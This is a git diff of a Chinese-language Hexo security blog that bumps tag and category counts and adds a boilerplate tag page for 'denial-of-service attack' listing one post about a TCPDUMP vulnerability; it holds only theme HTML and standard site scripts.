diff --git a/tags/USENIX/index.html b/tags/USENIX/index.html
index e83356b0..f7d6c7e8 100644
--- a/tags/USENIX/index.html
+++ b/tags/USENIX/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/index.html b/tags/index.html
index a9f085c9..a58387d2 100644
--- a/tags/index.html
+++ b/tags/index.html
@@ -298,10 +298,10 @@
         
           <div class="tag-cloud">
             <div class="tag-cloud-title">
-                目前共计 14 个标签
+                目前共计 16 个标签
             </div>
             <div class="tag-cloud-tags">
-              <a href="/tags/QQ/" style="font-size: 12px; color: #ccc">QQ</a> <a href="/tags/SSH/" style="font-size: 12px; color: #ccc">SSH</a> <a href="/tags/USENIX/" style="font-size: 12px; color: #ccc">USENIX</a> <a href="/tags/python/" style="font-size: 12px; color: #ccc">python</a> <a href="/tags/wifi/" style="font-size: 12px; color: #ccc">wifi</a> <a href="/tags/侧信道攻击/" style="font-size: 12px; color: #ccc">侧信道攻击</a> <a href="/tags/密码/" style="font-size: 12px; color: #ccc">密码</a> <a href="/tags/小米/" style="font-size: 12px; color: #ccc">小米</a> <a href="/tags/数据库/" style="font-size: 12px; color: #ccc">数据库</a> <a href="/tags/数据挖掘/" style="font-size: 12px; color: #ccc">数据挖掘</a> <a href="/tags/文件格式/" style="font-size: 12px; color: #ccc">文件格式</a> <a href="/tags/模型实现/" style="font-size: 12px; color: #ccc">模型实现</a> <a href="/tags/自然语言处理/" style="font-size: 12px; color: #ccc">自然语言处理</a> <a href="/tags/访问控制/" style="font-size: 12px; color: #ccc">访问控制</a>
+              <a href="/tags/QQ/" style="font-size: 12px; color: #ccc">QQ</a> <a href="/tags/SSH/" style="font-size: 12px; color: #ccc">SSH</a> <a href="/tags/TCPDUMP/" style="font-size: 12px; color: #ccc">TCPDUMP</a> <a href="/tags/USENIX/" style="font-size: 12px; color: #ccc">USENIX</a> <a href="/tags/python/" style="font-size: 12px; color: #ccc">python</a> <a href="/tags/wifi/" style="font-size: 12px; color: #ccc">wifi</a> <a href="/tags/侧信道攻击/" style="font-size: 12px; color: #ccc">侧信道攻击</a> <a href="/tags/密码/" style="font-size: 12px; color: #ccc">密码</a> <a href="/tags/小米/" style="font-size: 12px; color: #ccc">小米</a> <a href="/tags/拒绝服务攻击/" style="font-size: 12px; color: #ccc">拒绝服务攻击</a> <a href="/tags/数据库/" style="font-size: 12px; color: #ccc">数据库</a> <a href="/tags/数据挖掘/" style="font-size: 12px; color: #ccc">数据挖掘</a> <a href="/tags/文件格式/" style="font-size: 12px; color: #ccc">文件格式</a> <a href="/tags/模型实现/" style="font-size: 12px; color: #ccc">模型实现</a> <a href="/tags/自然语言处理/" style="font-size: 12px; color: #ccc">自然语言处理</a> <a href="/tags/访问控制/" style="font-size: 12px; color: #ccc">访问控制</a>
             </div>
           </div>
         
@@ -370,7 +370,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -381,7 +381,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/python/index.html b/tags/python/index.html
index 2f02f712..c2b09011 100644
--- a/tags/python/index.html
+++ b/tags/python/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/wifi/index.html b/tags/wifi/index.html
index c9041368..aec229c5 100644
--- a/tags/wifi/index.html
+++ b/tags/wifi/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/侧信道攻击/index.html b/tags/侧信道攻击/index.html
index 7cc2e2b0..227289c5 100644
--- a/tags/侧信道攻击/index.html
+++ b/tags/侧信道攻击/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/密码/index.html b/tags/密码/index.html
index 086136a9..026332c7 100644
--- a/tags/密码/index.html
+++ b/tags/密码/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/小米/index.html b/tags/小米/index.html
index 0d974562..e7b6cc8f 100644
--- a/tags/小米/index.html
+++ b/tags/小米/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/拒绝服务攻击/index.html b/tags/拒绝服务攻击/index.html
new file mode 100644
index 00000000..5b352657
--- /dev/null
+++ b/tags/拒绝服务攻击/index.html
@@ -0,0 +1,1106 @@
+<!DOCTYPE html>
+
+
+
+  
+
+
+<html class="theme-next gemini use-motion" lang="zh-Hans">
+<head><meta name="generator" content="Hexo 3.8.0">
+  <meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
+<meta name="theme-color" content="#222">
+
+
+
+
+
+
+
+
+
+<meta http-equiv="Cache-Control" content="no-transform">
+<meta http-equiv="Cache-Control" content="no-siteapp">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
+
+
+
+
+
+
+
+<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
+
+<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
+
+
+  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
+
+
+
+
+
+  <meta name="keywords" content="Hexo, NexT">
+
+
+
+
+
+
+
+
+
+
+<meta property="og:type" content="website">
+<meta property="og:title" content="混元霹雳手">
+<meta property="og:url" content="https://cool-y.github.io/tags/拒绝服务攻击/index.html">
+<meta property="og:site_name" content="混元霹雳手">
+<meta property="og:locale" content="zh-Hans">
+<meta name="twitter:card" content="summary">
+<meta name="twitter:title" content="混元霹雳手">
+
+
+
+<script type="text/javascript" id="hexo.configurations">
+  var NexT = window.NexT || {};
+  var CONFIG = {
+    root: '/',
+    scheme: 'Gemini',
+    version: '5.1.4',
+    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
+    fancybox: true,
+    tabs: true,
+    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
+    duoshuo: {
+      userId: '0',
+      author: '博主'
+    },
+    algolia: {
+      applicationID: '',
+      apiKey: '',
+      indexName: '',
+      hits: {"per_page":10},
+      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
+    }
+  };
+</script>
+
+
+
+  <link rel="canonical" href="https://cool-y.github.io/tags/拒绝服务攻击/">
+
+
+
+
+
+  <title>标签: 拒绝服务攻击 | 混元霹雳手</title>
+  
+
+
+
+
+
+
+
+
+</head>
+
+<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
+
+  
+  
+    
+  
+
+  <div class="container sidebar-position-left ">
+    <div class="headband"></div>
+
+    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
+      <div class="header-inner"><div class="site-brand-wrapper">
+  <div class="site-meta ">
+    
+
+    <div class="custom-logo-site-title">
+      <a href="/" class="brand" rel="start">
+        <span class="logo-line-before"><i></i></span>
+        <span class="site-title">混元霹雳手</span>
+        <span class="logo-line-after"><i></i></span>
+      </a>
+    </div>
+      
+        <p class="site-subtitle"></p>
+      
+  </div>
+
+  <div class="site-nav-toggle">
+    <button>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+    </button>
+  </div>
+</div>
+
+<nav class="site-nav">
+  
+
+  
+    <ul id="menu" class="menu">
+      
+        
+        <li class="menu-item menu-item-home">
+          <a href="/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
+            
+            首页
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-about">
+          <a href="/about/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
+            
+            关于
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-tags">
+          <a href="/tags/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
+            
+            标签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-categories">
+          <a href="/categories/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
+            
+            分类
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-archives">
+          <a href="/archives/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
+            
+            归档
+          </a>
+        </li>
+      
+
+      
+        <li class="menu-item menu-item-search">
+          
+            <a href="javascript:;" class="popup-trigger">
+          
+            
+              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
+            
+            搜索
+          </a>
+        </li>
+      
+    </ul>
+  
+
+  
+    <div class="site-search">
+      
+  <div class="popup search-popup local-search-popup">
+  <div class="local-search-header clearfix">
+    <span class="search-icon">
+      <i class="fa fa-search"></i>
+    </span>
+    <span class="popup-btn-close">
+      <i class="fa fa-times-circle"></i>
+    </span>
+    <div class="local-search-input-wrapper">
+      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
+    </div>
+  </div>
+  <div id="local-search-result"></div>
+</div>
+
+
+
+    </div>
+  
+</nav>
+
+
+
+ </div>
+    </header>
+
+    <main id="main" class="main">
+      <div class="main-inner">
+        <div class="content-wrap">
+          <div id="content" class="content">
+            
+
+  
+  
+  
+  <div class="post-block tag">
+
+    <div id="posts" class="posts-collapse">
+      <div class="collection-title">
+        <h1>拒绝服务攻击<small>标签</small>
+        </h1>
+      </div>
+
+      
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2019/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2019-12-25T12:26:05+08:00" content="2019-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+    </div>
+
+  </div>
+  
+  
+  
+
+  
+
+
+          </div>
+          
+
+
+          
+
+        </div>
+        
+          
+  
+  <div class="sidebar-toggle">
+    <div class="sidebar-toggle-line-wrap">
+      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
+    </div>
+  </div>
+
+  <aside id="sidebar" class="sidebar">
+    
+    <div class="sidebar-inner">
+
+      
+
+      
+
+      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
+        <div class="site-overview">
+          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
+            
+              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
+            
+              <p class="site-author-name" itemprop="name">Cool-Y</p>
+              <p class="site-description motion-element" itemprop="description"></p>
+          </div>
+
+          <nav class="site-state motion-element">
+
+            
+              <div class="site-state-item site-state-posts">
+              
+                <a href="/archives/">
+              
+                  <span class="site-state-item-count">7</span>
+                  <span class="site-state-item-name">日志</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-categories">
+                <a href="/categories/index.html">
+                  <span class="site-state-item-count">5</span>
+                  <span class="site-state-item-name">分类</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-tags">
+                <a href="/tags/index.html">
+                  <span class="site-state-item-count">16</span>
+                  <span class="site-state-item-name">标签</span>
+                </a>
+              </div>
+            
+
+          </nav>
+
+          
+
+          
+            <div class="links-of-author motion-element">
+                
+                  <span class="links-of-author-item">
+                    <a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
+                      
+                        <i class="fa fa-fw fa-github"></i>GitHub</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="http://weibo.com/HanYanOpenFire" target="_blank" title="Weibo">
+                      
+                        <i class="fa fa-fw fa-weibo"></i>Weibo</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
+                      
+                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
+                      
+                        <i class="fa fa-fw fa-instagram"></i>Instagram</a>
+                  </span>
+                
+            </div>
+          
+
+          
+          
+
+          
+          
+
+          
+
+        </div>
+      </section>
+
+      
+
+      
+
+    </div>
+  </aside>
+
+
+        
+      </div>
+    </main>
+
+    <footer id="footer" class="footer">
+      <div class="footer-inner">
+        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
+  <span class="with-love">
+    <i class="fa fa-user"></i>
+  </span>
+  <span class="author" itemprop="copyrightHolder">Cool-Y</span>
+
+  
+    <span class="post-meta-divider">|</span>
+    <span class="post-meta-item-icon">
+      <i class="fa fa-area-chart"></i>
+    </span>
+    
+    <span title="Site words total count">11.1k</span>
+  
+</div>
+
+
+  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
+
+
+
+
+
+
+
+
+        
+<div class="busuanzi-count">
+    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
+
+  
+    <span class="site-uv">
+      <i class="fa fa-user"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
+      
+    </span>
+  
+
+  
+    <span class="site-pv">
+      <i class="fa fa-eye"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
+      
+    </span>
+  
+</div>
+
+
+
+
+
+
+
+
+        
+      </div>
+    </footer>
+
+    
+      <div class="back-to-top">
+        <i class="fa fa-arrow-up"></i>
+        
+      </div>
+    
+
+    
+
+  </div>
+
+  
+
+<script type="text/javascript">
+  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
+    window.Promise = null;
+  }
+</script>
+
+
+
+
+
+
+
+
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
+  
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
+
+
+
+  
+  
+
+
+  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
+
+
+
+  
+
+  
+
+
+  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  
+
+
+
+
+	
+
+
+
+
+
+  
+
+
+
+
+
+  
+
+
+
+
+
+
+
+<!-- LOCAL: You can save these files to your site and update links -->
+    
+        
+        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
+        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
+    
+<!-- END LOCAL -->
+
+    
+
+    
+
+
+
+
+
+
+
+  
+
+  <script type="text/javascript">
+    // Popup Window;
+    var isfetched = false;
+    var isXml = true;
+    // Search DB path;
+    var search_path = "search.xml";
+    if (search_path.length === 0) {
+      search_path = "search.xml";
+    } else if (/json$/i.test(search_path)) {
+      isXml = false;
+    }
+    var path = "/" + search_path;
+    // monitor main search box;
+
+    var onPopupClose = function (e) {
+      $('.popup').hide();
+      $('#local-search-input').val('');
+      $('.search-result-list').remove();
+      $('#no-result').remove();
+      $(".local-search-pop-overlay").remove();
+      $('body').css('overflow', '');
+    }
+
+    function proceedsearch() {
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
+        .css('overflow', 'hidden');
+      $('.search-popup-overlay').click(onPopupClose);
+      $('.popup').toggle();
+      var $localSearchInput = $('#local-search-input');
+      $localSearchInput.attr("autocapitalize", "none");
+      $localSearchInput.attr("autocorrect", "off");
+      $localSearchInput.focus();
+    }
+
+    // search function;
+    var searchFunc = function(path, search_id, content_id) {
+      'use strict';
+
+      // start loading animation
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
+          '<div id="search-loading-icon">' +
+          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
+          '</div>' +
+          '</div>')
+        .css('overflow', 'hidden');
+      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
+
+      $.ajax({
+        url: path,
+        dataType: isXml ? "xml" : "json",
+        async: true,
+        success: function(res) {
+          // get the contents from search data
+          isfetched = true;
+          $('.popup').detach().appendTo('.header-inner');
+          var datas = isXml ? $("entry", res).map(function() {
+            return {
+              title: $("title", this).text(),
+              content: $("content",this).text(),
+              url: $("url" , this).text()
+            };
+          }).get() : res;
+          var input = document.getElementById(search_id);
+          var resultContent = document.getElementById(content_id);
+          var inputEventFunction = function() {
+            var searchText = input.value.trim().toLowerCase();
+            var keywords = searchText.split(/[\s\-]+/);
+            if (keywords.length > 1) {
+              keywords.push(searchText);
+            }
+            var resultItems = [];
+            if (searchText.length > 0) {
+              // perform local searching
+              datas.forEach(function(data) {
+                var isMatch = false;
+                var hitCount = 0;
+                var searchTextCount = 0;
+                var title = data.title.trim();
+                var titleInLowerCase = title.toLowerCase();
+                var content = data.content.trim().replace(/<[^>]+>/g,"");
+                var contentInLowerCase = content.toLowerCase();
+                var articleUrl = decodeURIComponent(data.url);
+                var indexOfTitle = [];
+                var indexOfContent = [];
+                // only match articles with not empty titles
+                if(title != '') {
+                  keywords.forEach(function(keyword) {
+                    function getIndexByWord(word, text, caseSensitive) {
+                      var wordLen = word.length;
+                      if (wordLen === 0) {
+                        return [];
+                      }
+                      var startPosition = 0, position = [], index = [];
+                      if (!caseSensitive) {
+                        text = text.toLowerCase();
+                        word = word.toLowerCase();
+                      }
+                      while ((position = text.indexOf(word, startPosition)) > -1) {
+                        index.push({position: position, word: word});
+                        startPosition = position + wordLen;
+                      }
+                      return index;
+                    }
+
+                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
+                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
+                  });
+                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
+                    isMatch = true;
+                    hitCount = indexOfTitle.length + indexOfContent.length;
+                  }
+                }
+
+                // show search results
+
+                if (isMatch) {
+                  // sort index by position of keyword
+
+                  [indexOfTitle, indexOfContent].forEach(function (index) {
+                    index.sort(function (itemLeft, itemRight) {
+                      if (itemRight.position !== itemLeft.position) {
+                        return itemRight.position - itemLeft.position;
+                      } else {
+                        return itemLeft.word.length - itemRight.word.length;
+                      }
+                    });
+                  });
+
+                  // merge hits into slices
+
+                  function mergeIntoSlice(text, start, end, index) {
+                    var item = index[index.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    var hits = [];
+                    var searchTextCountInSlice = 0;
+                    while (position + word.length <= end && index.length != 0) {
+                      if (word === searchText) {
+                        searchTextCountInSlice++;
+                      }
+                      hits.push({position: position, length: word.length});
+                      var wordEnd = position + word.length;
+
+                      // move to next position of hit
+
+                      index.pop();
+                      while (index.length != 0) {
+                        item = index[index.length - 1];
+                        position = item.position;
+                        word = item.word;
+                        if (wordEnd > position) {
+                          index.pop();
+                        } else {
+                          break;
+                        }
+                      }
+                    }
+                    searchTextCount += searchTextCountInSlice;
+                    return {
+                      hits: hits,
+                      start: start,
+                      end: end,
+                      searchTextCount: searchTextCountInSlice
+                    };
+                  }
+
+                  var slicesOfTitle = [];
+                  if (indexOfTitle.length != 0) {
+                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
+                  }
+
+                  var slicesOfContent = [];
+                  while (indexOfContent.length != 0) {
+                    var item = indexOfContent[indexOfContent.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    // cut out 100 characters
+                    var start = position - 20;
+                    var end = position + 80;
+                    if(start < 0){
+                      start = 0;
+                    }
+                    if (end < position + word.length) {
+                      end = position + word.length;
+                    }
+                    if(end > content.length){
+                      end = content.length;
+                    }
+                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
+                  }
+
+                  // sort slices in content by search text's count and hits' count
+
+                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
+                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
+                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
+                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
+                      return sliceRight.hits.length - sliceLeft.hits.length;
+                    } else {
+                      return sliceLeft.start - sliceRight.start;
+                    }
+                  });
+
+                  // select top N slices in content
+
+                  var upperBound = parseInt('1');
+                  if (upperBound >= 0) {
+                    slicesOfContent = slicesOfContent.slice(0, upperBound);
+                  }
+
+                  // highlight title and content
+
+                  function highlightKeyword(text, slice) {
+                    var result = '';
+                    var prevEnd = slice.start;
+                    slice.hits.forEach(function (hit) {
+                      result += text.substring(prevEnd, hit.position);
+                      var end = hit.position + hit.length;
+                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
+                      prevEnd = end;
+                    });
+                    result += text.substring(prevEnd, slice.end);
+                    return result;
+                  }
+
+                  var resultItem = '';
+
+                  if (slicesOfTitle.length != 0) {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
+                  } else {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
+                  }
+
+                  slicesOfContent.forEach(function (slice) {
+                    resultItem += "<a href='" + articleUrl + "'>" +
+                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
+                      "...</p>" + "</a>";
+                  });
+
+                  resultItem += "</li>";
+                  resultItems.push({
+                    item: resultItem,
+                    searchTextCount: searchTextCount,
+                    hitCount: hitCount,
+                    id: resultItems.length
+                  });
+                }
+              })
+            };
+            if (keywords.length === 1 && keywords[0] === "") {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
+            } else if (resultItems.length === 0) {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
+            } else {
+              resultItems.sort(function (resultLeft, resultRight) {
+                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
+                  return resultRight.searchTextCount - resultLeft.searchTextCount;
+                } else if (resultLeft.hitCount !== resultRight.hitCount) {
+                  return resultRight.hitCount - resultLeft.hitCount;
+                } else {
+                  return resultRight.id - resultLeft.id;
+                }
+              });
+              var searchResultList = '<ul class=\"search-result-list\">';
+              resultItems.forEach(function (result) {
+                searchResultList += result.item;
+              })
+              searchResultList += "</ul>";
+              resultContent.innerHTML = searchResultList;
+            }
+          }
+
+          if ('auto' === 'auto') {
+            input.addEventListener('input', inputEventFunction);
+          } else {
+            $('.search-icon').click(inputEventFunction);
+            input.addEventListener('keypress', function (event) {
+              if (event.keyCode === 13) {
+                inputEventFunction();
+              }
+            });
+          }
+
+          // remove loading animation
+          $(".local-search-pop-overlay").remove();
+          $('body').css('overflow', '');
+
+          proceedsearch();
+        }
+      });
+    }
+
+    // handle and trigger popup window;
+    $('.popup-trigger').click(function(e) {
+      e.stopPropagation();
+      if (isfetched === false) {
+        searchFunc(path, 'local-search-input', 'local-search-result');
+      } else {
+        proceedsearch();
+      };
+    });
+
+    $('.popup-btn-close').click(onPopupClose);
+    $('.popup').click(function(e){
+      e.stopPropagation();
+    });
+    $(document).on('keyup', function (event) {
+      var shouldDismissSearchPopup = event.which === 27 &&
+        $('.search-popup').is(':visible');
+      if (shouldDismissSearchPopup) {
+        onPopupClose();
+      }
+    });
+  </script>
+
+
+
+
+
+  
+
+  
+  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
+  <script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
+  <script>
+    function showTime(Counter) {
+      var query = new AV.Query(Counter);
+      var entries = [];
+      var $visitors = $(".leancloud_visitors");
+
+      $visitors.each(function () {
+        entries.push( $(this).attr("id").trim() );
+      });
+
+      query.containedIn('url', entries);
+      query.find()
+        .done(function (results) {
+          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
+
+          if (results.length === 0) {
+            $visitors.find(COUNT_CONTAINER_REF).text(0);
+            return;
+          }
+
+          for (var i = 0; i < results.length; i++) {
+            var item = results[i];
+            var url = item.get('url');
+            var time = item.get('time');
+            var element = document.getElementById(url);
+
+            $(element).find(COUNT_CONTAINER_REF).text(time);
+          }
+          for(var i = 0; i < entries.length; i++) {
+            var url = entries[i];
+            var element = document.getElementById(url);
+            var countSpan = $(element).find(COUNT_CONTAINER_REF);
+            if( countSpan.text() == '') {
+              countSpan.text(0);
+            }
+          }
+        })
+        .fail(function (object, error) {
+          console.log("Error: " + error.code + " " + error.message);
+        });
+    }
+
+    function addCount(Counter) {
+      var $visitors = $(".leancloud_visitors");
+      var url = $visitors.attr('id').trim();
+      var title = $visitors.attr('data-flag-title').trim();
+      var query = new AV.Query(Counter);
+
+      query.equalTo("url", url);
+      query.find({
+        success: function(results) {
+          if (results.length > 0) {
+            var counter = results[0];
+            counter.fetchWhenSave(true);
+            counter.increment("time");
+            counter.save(null, {
+              success: function(counter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(counter.get('time'));
+              },
+              error: function(counter, error) {
+                console.log('Failed to save Visitor num, with error message: ' + error.message);
+              }
+            });
+          } else {
+            var newcounter = new Counter();
+            /* Set ACL */
+            var acl = new AV.ACL();
+            acl.setPublicReadAccess(true);
+            acl.setPublicWriteAccess(true);
+            newcounter.setACL(acl);
+            /* End Set ACL */
+            newcounter.set("title", title);
+            newcounter.set("url", url);
+            newcounter.set("time", 1);
+            newcounter.save(null, {
+              success: function(newcounter) {
